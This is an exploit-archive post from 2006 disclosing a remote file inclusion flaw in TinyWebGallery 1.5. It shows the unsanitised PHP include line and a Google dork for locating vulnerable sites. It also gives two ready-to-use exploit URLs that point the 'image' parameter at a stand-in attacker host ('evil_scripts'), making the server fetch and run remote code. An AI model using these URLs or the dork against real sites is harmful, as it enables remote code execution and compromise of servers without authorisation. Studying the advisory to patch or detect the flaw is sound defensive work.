[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : TinyWebGallery <= 1.5 (image) Remote Include Vulnerabilities
# Published : 2006-08-09
# Author : xoron
# Previous Title : Tagger Luxury Edition (BBCodeFile) Remote File Include Vulnerability
# Next Title : PHPMyRing <= 4.2.0 (view_com.php) Remote SQL Injection Exploit
####################################################
# #
# #
# C Y B E R - W A R R i O R T I M #
# #
# #
####################################################
TinyWebGallery v1.5 ( image ) Remote Include Vulnerability
------------------------------------------------------------------------------
Author: xoron
------------------------------------------------------------------------------
Script: TinyWebGallery
------------------------------------------------------------------------------
Class: Remote
------------------------------------------------------------------------------
cont@ct: x0r0n[at]hotmail[dot]com
------------------------------------------------------------------------------
CODE:
<?php
include ($image . ".txt");
?>
------------------------------------------------------------------------------
google dork: "powered by twg"
------------------------------------------------------------------------------
Exploit:
http://www.site.com/[path]/examples/image.php?image=http://evil_scripts
http://www.site.com/[path]/examples/examples/image.php2?image=http://evil_scripts?
###########################################################################
# #
#Greetz: str0ke, Preddy, Iron, x-master, DJR, R3D4C!D and all my friends #
# #
###########################################################################
# www.Syue.com [2006-08-09]